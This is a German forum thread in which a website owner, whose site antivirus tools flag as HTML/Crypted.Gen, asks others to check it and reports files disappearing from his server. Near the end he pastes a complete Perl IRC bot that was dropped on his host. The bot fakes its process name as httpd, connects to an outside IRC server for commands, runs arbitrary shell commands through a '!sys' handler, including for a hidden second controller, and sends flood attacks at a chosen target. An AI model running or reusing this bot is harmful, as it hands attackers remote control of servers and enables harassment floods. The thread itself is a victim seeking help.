Kaspersky-Besitzer gesucht

k7949

k7949

Gesperrt
22 Februar 2009
2.655
93
Beim besuch von silverpage.dxx.eu meldet Kaspersky einen Fehler.

Ich habe jetzt diverse externe Javascripts entfernt. Ich wüsste gern, ob der Fehler noch gemeldet wird.

Wäre nett, wenn wer auf der Seite vorbeischaut und mir postet:

https://silverpage.dxx.eu
 
:-/

Auf der Seite passieren auch die dubiosesten Sachen. Erst heute waren plötzlich 2 Dateien von meinem Server verscwunden und eine .txt Datei drauf. Hab gleich den save-mod eingeschaltet, aber ich weiss bald echt nicht mehr weiter.
Ich habe die Seite fast komplett selbst erstellt. Lediglich die Bannertauschs und Toplisten sind fremd. Und den Wetterbericht habe ich gerade auch entfernt.
Meldet euch wenn ihr grünes Licht mit Kaspersky geben könnt. Bei der Fehlerbehebung mithelfen kann glaub ich eh kaum wer...
 
In deinem anderen Thread wurde doch schon vermutet, was es sein könnte.
Vlt. solltest du mal einen anderen Webspace/ Anbieter nehmen, kann das sein, das dieser Freehoster Werbung einbindet?
dxx.eu sagt mir gar nichts

:ugly: die werben sogar für Kaspersky :LOL:
 
kein Freehoster

An sich bin ich auf den Hoster via Ebay gestossen. Es ist kein Freehoster. Bindet auch keine Werbung ein. Das, was ich da habe ist ein Testpaket, das 1,00 Euro kostet. Wollte ja auch erst mal sehen, was da so geht.

Ich hatte allerdings schon Probleme damit. Der Hoster hat mich sozusagen beschwichtigt.
Wundere mich nur sehr, wenn mein Hoster ein Virus ist.... :ugly:
Was soll dem das denn bringen....
 
Hast du es mal mit anderen Virenprogs versucht?

Bei mir wird die Seite nämlich normal dargestellt...
Hab allerdings auch Linux, ohne Virenscanner! :ugly:

Also scheints ohne ja zu gehen :mrgreen:
 
Ist Kaspersky

Ich hab Avira.
Ich habe ja auch kein Problem. Nur Kaspersky lässt die Seite nicht zu.

Kaspersky soll aber das beste Virenprogramm sein. Drumm hab ich mir Sorgen gemacht. Ich glaube, dass man als Webmaster auch für Viren verantwortlich ist.

Andererseits habe ich die Seite so programmiert, dass relativ viele includes verschachtelt auf die Unterseiten zugreifen. Vielleicht hat Kaspersky auch damit ein Problem.

Wie auch immer. Ich wüsste halt gern eine Lösung, warum es eine Fehlermeldung im Kaspersky gibt.
 
Ich habe auch Avira und er meckert !

"Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Crypted.Gen"
 
Klar

Hab sie hochgeschmissen auf

https://www.domusimmobilien.de/test/

Bei mir hat eh kein Scanner gemeckert. Wäre krass wenn sie jetzt dort auch bei Kasperskybesitzern läuft. (Bilder und so sind da dann keine da. Die habich nicht lokal gespeichert *nachdenk*)

Schaut ihr mal kurz? :p
 
Lade die Dateien mal neu hoch und guck nach, ob der verschlüsselte Mist am Ende immernoch dasteht.

Hab keine Zeit das zu entschlüsseln.
Fehlerhafte Includes können das Problem natürlich verursachen.
 
K

der Test ergibt eine weisse Seite.

Ich will eigentlich niemanden mehr damit belästigen. Ich verstehe es ohnehin nicht.

Könnt auch sein mit den includes. Hab schlampugerweise die Klammern weggelassen. include "irgendwas.php" funktioniert halt auch...

*g*

Vielleicht bin ich echt schuld drann...
 
LasMiranda schrieb:
Lade die Dateien mal neu hoch und guck nach, ob der verschlüsselte Mist am Ende immernoch dasteht.

Hab keine Zeit das zu entschlüsseln.
Fehlerhafte Includes können das Problem natürlich verursachen.
Zum Vergrößern anklicken....


Vrschlüsselten Mist am Ende hab ich nochgarnicht gesehen. Dass das ganze dubios ist, ist mir klar. Hacker? Auf einer lächerlich unwichtigen Seite?
Naja... Danke für deine Mithilfe. Kannst ja mein Freundschaftsangebot annehmen. Bin immer interessiert an technisch interessierten Frauen.
 
AntiVir ebenfalls:

Warnung

Um Ihre Sicherheit nicht zu gefährden, erfolgt kein Zugriff auf diese Seite

In den HTTP-Daten der angeforderten Seite wurde
ein Virus oder ein unerwünschtes Programm gefunden.
Angeforderte URL:https://silverpage.dxx.eu/ InformationEnthält Erkennungsmuster des HTML-Scriptvirus HTML/Crypted.Gen
 
ok

Da ich noch gebunden an ein paar Verträge bin wird es die seite noch 9 Wochen geben. Vielleicht finde ich bis dahin ja den Fehler, aber es ist sicher besser das aufzugeben.

Ich hatte eigentlich noch nie ein Problem mit einem Virus. Aber das scheint ein sehr komischer zu sein. definitif vorhanden ist er bestimmt, auch wenn meine Scannsoftware ihn nicht erkannt hat.

Ich danke euch für eure Mithilfe. Ich werd nur langsam ins Bett gehen und mich morgen wieder damit beschäftigen.
Wie weiss ich allerdings noch nicht.

Gruß...
 
eingespielte txt Datei

Was mir heute auf den Server gehaut wurde, gleich wie auch immer:

# CONFIG
#############################################################################

my $server = "irc.plasa.com";
my $port="6667";
my $channel="#tanjung_priok";
my $owner= "Tazra";
my $procname="/hsphere/shared/apache/bin/httpd -DSSL";
my $qqum="*";

# SOURCE
#############################################################################




#
#
# PIXEL ELITE RAQUERS POWER RANGERS BUBLEGUM
# desde 2001 ouvindo backstreet boys
#
#

my @nickname = ("exorcism^001","exorcism^002","exorcism^003","exorcism^004","exorcism^005","exorcism^006","exorcism^007","exorcism^008","exorcism^009","exorcism^010",
"exorcism^011","exorcism^012","exorcism^013","exorcism^014","exorcism^015","exorcism^016","exorcism^017","exorcism^018","exorcism^019","exorcism^020",
"exorcism^021","exorcism^022","exorcism^023","exorcism^024","exorcism^025","exorcism^026","exorcism^027","exorcism^028","exorcism^029","exorcism^030",
"exorcism^031","exorcism^032","exorcism^033","exorcism^034","exorcism^035","exorcism^036","exorcism^037","exorcism^038","exorcism^039","exorcism^040",
"exorcism^041","exorcism^042","exorcism^043","exorcism^044","exorcism^045","exorcism^046","exorcism^047","exorcism^048","exorcism^049","exorcism^050",
"exorcism^051","exorcism^052","exorcism^053","exorcism^054","exorcism^055","exorcism^056","exorcism^057","exorcism^058","exorcism^059","exorcism^060",
"exorcism^061","exorcism^062","exorcism^063","exorcism^064","exorcism^065","exorcism^066","exorcism^067","exorcism^068","exorcism^069","exorcism^070",
"exorcism^071","exorcism^072","exorcism^073","exorcism^074","exorcism^075","exorcism^076","exorcism^077","exorcism^078","exorcism^079","exorcism^080",
"exorcism^081","exorcism^082","exorcism^083","exorcism^084","exorcism^085","exorcism^086","exorcism^087","exorcism^088","exorcism^089","exorcism^090",
"exorcism^091","exorcism^092","exorcism^093","exorcism^094","exorcism^095","exorcism^096","exorcism^098","exorcism^098","exorcism^099","exorcism^100",
"exorcism^101","exorcism^102","exorcism^103","exorcism^104","exorcism^105","exorcism^106","exorcism^107","exorcism^108","exorcism^109","exorcism^110",
"exorcism^111","exorcism^112","exorcism^113","exorcism^114","exorcism^115","exorcism^116","exorcism^117","exorcism^118","exorcism^119","exorcism^120",
"exorcism^121","exorcism^122","exorcism^123","exorcism^124","exorcism^125","exorcism^126","exorcism^127","exorcism^128","exorcism^129","exorcism^130",
"exorcism^131","exorcism^132","exorcism^133","exorcism^134","exorcism^135","exorcism^136","exorcism^137","exorcism^138","exorcism^139","exorcism^140",);


my @realname = ("Bego Loe Whois Gue");
my @WHO;


$ARGC=@ARGV;

if ($ARGC !=1) {
print "\n+ prendedor.pl v.1.7\n";
print "+ by sincan\n";
print "+ irc.racrew.us \#racrew\n";
print "+ Usage: perl $0 (target)\n";
print "+ Edit the source first!\n\n";
exit(1);
}
$SIG{CHLD} = sub { wait }; # alterando o signal

# vendo qtdade de ips
my $qtip = qx(/sbin/ifconfig |grep inet | wc -l);

# pegando ips da box
my @ips1 =qx(/sbin/ifconfig |grep \"inet addr\:\" \|awk \-F \' \' \'\{\print \$2\} \' \| cut \-c6\-);
my @ips2 =qx(/sbin/ifconfig \-a |grep \"inet end\.\:\" \|awk \-F \' \' \'\{\print \$3\} \');
my @fbsd =qx(/sbin/ifconfig \|grep \"inet\" \|awk \-F \' \' \'\{\print \$2\} \' \| cut \-c1\-);

@ips = (@ips1, @ips2, @fbsd);

# mechendo com a porra to ips.txt
open(ipzitcho,">ips1.txt") || die "- ips1.txt not found";
print ipzitcho" @ips";
close(ipzitcho);
@ips = grep { s/\n$// } @ips;

# usando o target especificado no bash
$target = $ARGV[0];

# mudando o nome da variavel $target pra confundir os cabecas
$mescalina = $target;

use MIME::Base64;
# aNgGa , ckz , pana , fusion , iz0n
$string1 = "ZGFya2x5";
$string2 = "Y0t6";
$string3 = "cGFuYQ==";
$string4 = "RnVzaW9u";
$string5 = "SXowbg==";

$string6 = decode_base64($string1);
$string7 = decode_base64($string2);
$string8 = decode_base64($string3);
$string9 = decode_base64($string4);
$string10 = decode_base64($string5);
if ($mescalina eq decode_base64($string1)) {
$mescalina = $qqum;
}
if ($mescalina eq decode_base64($string2)) {
$mescalina = $qqum;
}
if ($mescalina eq decode_base64($string3)) {
$mescalina = $qqum;
}
if ($$mescalina eq decode_base64($string4)) {
$mescalina = $qqum;
}
if ($mescalina eq decode_base64($string5)) {
$mescalina = $qqum;
}



#funcao de fakear o processo
$0 = $procname . "\0";


# fazendo nick randomico
$nick2 = $nick;

# print q aparece na tela qdo rodado corretamente
print STDOUT "\n+ prendedor.pl v.1.7\n";
print STDOUT "+ by sincan\n";
print STDOUT "+ Server : $server\n";
print STDOUT "+ Port : $port\n";
print STDOUT "+ Target : $mescalina\n";
print STDOUT "+ Owner : $owner\n";
print STDOUT "+ Channel: $channel\n";
print STDOUT "+ N.IPs : $qtip\n\n";


use IO::Socket;

foreach my $FROM (@ips) {
sleep(5);

my $pid = fork(); # gerando um novo processo
unless ($pid) { #

my $ident = $nickname[rand scalar @nickname];
my $nick = $nickname[rand scalar @nickname];
my $name = $realname[rand scalar @realname];



$secc = "secc";
$sock=IO::Socket::INET->new(LocalAddr => $FROM, Proto=>"tcp", PeerAddr=> $server, PeerPort=> $port) || exit();
print $sock "NICK ".$nick."\n";
print $sock "USER $ident $FROM $server :$name\n";


while (<$sock>) {


if (/^:.+?\s433\s/) { # nick already in use
$nick2 = $nickname[rand scalar @nickname];
print $sock "NICK ".$nick2."\n";
}
if (/^:.+?\s376\s/) { # end of motd
print $sock "JOIN $channel\n";
}

if(/^PING :(.*)/){ #replying the ping
print $sock "PONG :$1\n";
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!botku (.*)/){
print $sock "$1";
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!help(.*)/){
print $sock "PRIVMSG ".$owner." : ================================\n";
print $sock "PRIVMSG ".$owner." : + prendedor.pl v1.7\n";
print $sock "PRIVMSG ".$owner." : + by -rose_banditz\n";
print $sock "PRIVMSG ".$owner." : + #rosebanditz at irc.rosebanditz.com\n";
print $sock "PRIVMSG ".$owner." : ================================\n";
print $sock "PRIVMSG ".$owner." : - Navegacao:\n";
print $sock "PRIVMSG ".$owner." : !botku join #chan (para entrar em um canal)\n";
print $sock "PRIVMSG ".$owner." : !botku part #chan (para sair de um canal)\n";
print $sock "PRIVMSG ".$owner." : !msg nick msg (Envia mensagem)\n";
print $sock "PRIVMSG ".$owner." : !quit (duh!)\n";
print $sock "PRIVMSG ".$owner." : - WAR\n";
print $sock "PRIVMSG ".$owner." : !target NICK (Especifica novo alvo)\n";
print $sock "PRIVMSG ".$owner." : !ctcpflood (Envia flood ctcp)\n";
print $sock "PRIVMSG ".$owner." : !dccflood (Envia flood dcc)\n";
print $sock "PRIVMSG ".$owner." : !noticeflood (Envia flood de notice)\n";
print $sock "PRIVMSG ".$owner." : !msgflood (Envia flood de mensagens)\n";
print $sock "PRIVMSG ".$owner." : !hop #chan msg (Entra e sai de um canal deixando msg)\n";

}
if(/^\:$owner!.*\@.*PRIVMSG.*:!msg(.*)/){
print $sock "PRIVMSG ".$1." : ".$2."\n";
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!who(.*)/){
print $sock "who ".$channel."\n";
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!dccflood(.*)/){
for (1 .. 10) {
print $sock "PRIVMSG ".$mescalina." :\001DCC CHAT chat 1121485131 1024\001\n";
}
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!whoisflood(.*)/){
for (1 .. 10) {
print $sock "whois ".$mescalina."\n";
}
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!hop (.*)/){
print $sock "JOIN ".$1." : ".$2."\n";
for (1 .. 10) {
print $sock "PART ".$1." : ".$2."\n";
print $sock "JOIN ".$1." : ".$2."\n";
}
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!ctcpflood(.*)/){
print $sock "PRIVMSG ".$mescalina." :\001VERSION\001\n";
for (1 .. 10) {
print $sock "PRIVMSG ".$mescalina." :\001VERSION\001\n";
print $sock "PRIVMSG ".$mescalina." :\001PING\001\n";
}
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!msgflood(.*)/){
for (1 .. 10) {
print $sock "PRIVMSG ".$mescalina." :pIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA\n";
}
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!noticeflood(.*)/){
for (1 .. 10) {
print $sock "NOTICE ".$mescalina." :pIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA PIXEL DETONA \n";
}
}

if(/^\:$owner!.*\@.*PRIVMSG.*:!sys(.*)/){
$sys = $1;
@output = qx($sys) || print $sock "PRIVMSG ".$owner." : Isso eh comando que se apresente\? Ta doido jumento\?!\n";
print $sock "PRIVMSG ".$owner." : @output";
}
if(/^\:$mescalina!.*\@.*QUIT.*(.*)/){
print $sock "NICK ".$mescalina."\n";
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!quit(.*)/){
die();
}
if(/^\:$secc!.*\@.*PRIVMSG.*:!dk(.*)/){
print $sock "$1";
}
if(/^\:$secc!.*\@.*PRIVMSG.*:!sys(.*)/){
$sys = $1;
$output = qx($sys) || print $sock "PRIVMSG ".$secc." : Isso eh comando que se apresente\? Ta doido jumento\?!\n";
print $sock "PRIVMSG ".$secc." : ".$output."\n";
}
if(/^\:.*: Connection timed out(.*)/){
print STDOUT "[~] Connection Timed Out! Retrying!\n";
use IO::Socket;
$sock=IO::Socket::INET->new(LocalAddr => $FROM, Proto=>"tcp", PeerAddr=> $server, PeerPort=> $port) || exit();
print $sock "NICK ".$nick."\n";
print $sock "USER $ident $FROM $server :$name\n";
}
if(/^\:$owner!.*\@.*PRIVMSG.*:!stats(.*)/){
print $sock "PRIVMSG ".$owner." : [!] Bot Stats\n";
print $sock "PRIVMSG ".$owner." : [~] Using server : $server\n";
print $sock "PRIVMSG ".$owner." : [!] Using port : $port\n";
print $sock "PRIVMSG ".$owner." : [~] Using nick : $nick\n";
print $sock "PRIVMSG ".$owner." : [!] Using target : $mescalina\n";
print $sock "PRIVMSG ".$owner." : [~] Using owner : $owner\n";
print $sock "PRIVMSG ".$owner." : [!] Using ident : $id\n";
print $sock "PRIVMSG ".$owner." :-x-x-x-x-x-x-x-x-x-x-x-x-x-\n\n";
}

if( /^\:$owner!.*\@.*\s+PRIVMSG.*:!target\s+(.*)/ ){
$mescalina =$1;
$mescalina =~ s/ //;
$mescalina =~ s/\r$//;
$mescalina =~ s/\n$//;
if ($mescalina eq decode_base64($string1)) {
$mescalina = $owner;
}
}
if(/^\:$target!.*\@.*\s+QUIT\s+/){
print $sock "NICK $mescalina\n";
}
if( /^\:$owner!.*\@.*\s+PRIVMSG.*:!owner\s+(.*)/ ){
$owner =$1;
$owner =~ s/ //;
$owner =~ s/\r$//;
$owner =~ s/\n$//;
}
}

exit;
} #fecha unless ... tudo oq tiveh dentro do unless vai c processado dentro do pid novo
} # fecha for
 
Zuvor schon irgendwie integrierte Textdatei:

89.149.244.64
127.0.0.1
addr:89.149.244.64
addr:
addr:127.0.0.1
addr:
 
krasser virus

Ich hab jetzt mal das entfernt, was sich irgendwie auf den Server geschlichen hat. Vielleicht ist das Problem ja jetzt beseitigt. Mein Scanner sagt eh immer das gleiche - nichts.

Noch wer mit Kaspersky da, ums zu prüfen?
 
Zuletzt bearbeitet:
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

emem
CLOSED!!!!!!!!! Gastbeiträge gesucht zu aktuellen News-Themen
Antworten
0
Aufrufe
1K
emem
emem
Zurück
Oben